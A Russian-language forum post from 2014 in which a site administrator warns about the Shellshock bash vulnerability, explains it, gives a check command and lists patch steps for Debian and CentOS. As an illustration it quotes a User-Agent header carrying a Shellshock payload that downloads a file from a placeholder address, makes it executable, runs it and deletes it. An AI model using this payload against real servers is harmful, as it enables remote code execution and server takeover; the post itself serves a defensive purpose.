Автор Тема: Уязвимость интерпретатора bash  (Прочитано 1724 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Андрей

  • Администраторы
  • Лучший
  • *****
  • Сообщений: 8080
  • Карма: +113/-72
  • Пол: Мужской
  • Я тут главный...
    • Виртуальный Брест
Уязвимость интерпретатора bash
« : 06 Октября 2014, 16:03:05 »
Возможно, Вы еще не знаете, в конце сентября были опубликованы данные об уязвимости интерпретатора bash, которой оказались подвержены почти все серверы в мире. Данная уязвимость позволяет загрузить на сервер произвольные файлы, а так же получить доступ к системным файлам сервера. Это очень опасно! 10 баллов по 10-ти бальной шкале! Может привести к компрометации важной информации, заражению сервера вирусами, взломам со всеми последствиями.

Мы провели выборочную проверку сайтов, которая показала, что большинство серверов все еще подвержены данной уязвимости. Необходимо проверить подвержен ли Ваш сайт/сервер и если подвержен - немедленно залатать данную брешь.





Критическая уязвимость Shellshock
В середине сентября была опубликована информация о том, что была найдена уязвимость в интерпретаторе bash, которая позволяет выполнять произвольный код на уязвимом сервере.

Для тех кто не знает, bash – это командная оболочка в системах *nix или другими словами – интерпретатор, позволяющий выполнять различные команды, обычно после подключения к машине через SSH или Telnet. Bash также может выполнять роль парсера CGI-скриптов на веб-сервере, что мы обычно наблюдаем на запущенном Apache. Bash по умолчанию используется в операционных системах Linux, которые чрезвычайно распространены. Поэтому данная уязвимость представляет большую опасность для большинства серверов во всем мире.

По данным портала pr-cy.ry, уязвимые операционные системы используют более 75% всех проверяемых сайтов и серверов.

В чем заключается опасность

Основная угроза заключается в возможности произвольной установки переменных окружения внутри интерпретатора, в которых объявляются функции. Проблема возникает тогда, когда Bash продолжает обрабатывать команды после объявления функции, в результате чего мы наблюдаем атаку, связанную с внедрением кода.

Например, достаточно зайти на атакуемый сервер и подставить User-Agent, например такой:

UserAgent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z YY.YYY.YYY.YY/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"

Данная команда скачает на сервер файл, поставит на него права на исполнение, запустит его и затем удалит. Что может быть в этом файле? Да что угодно! Это может быть заражение сервера вирусами, превращение его в бота, выкачивание каких-нибудь файлов с сервера, удаленное управление сервером и многое другое.

С учетом того, что замена User-Agent при заходе на сайт не представляет никакой сложности, данная уязвимость может эксплуатироваться кем угодно и может привести к катастрофическим последствиям на любом сервере.

Данная уязвимость получила названия Shellshock и Bashdoor

Как проверить, уязвим ли ваш сервер

Достаточно зайти на него через SSH и выполнить команду

env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

Если после выполнения вы увидите слово busted и stuff одновременно – значит ваша система подвержена этой уязвимости. Если после выполнения вы видите только слово stuff – значит все в порядке, можно спать спокойно.

Как защититься от уязвимости Shellshock / Bashdoor

Для исправления уязвимости необходимого обновить bash до последней версии.

Debian 6.X

Отредактируйте /etc/apt/sources.list и добавьте в него следующую строку:

deb http://ftp.us.debian.org/debian squeeze-lts main non-free contrib

После этого необходимо обновить информацию о пакетах:

apt-get update

И обновить сам bash:

apt-get install bash

Debian 7.X

Просто выполняем сперва

apt-get update

затем обновляем bash

apt-get install bash

Centos (все версии)

Обновляем bash командой:
yum update bash


Если Вы не имеете доступ к SSH или не имеете прав на обновление компонентов на сервере (например, используете виртуальный хостинг), то обратитесь в службу поддержки своего хостинга и дайте им ссылку на эту страницу и спросите – устранили ли они эту уязвимость на сервере, где расположен Ваш сайт.
не знаешь как быть, спроси меня... желательно в личку!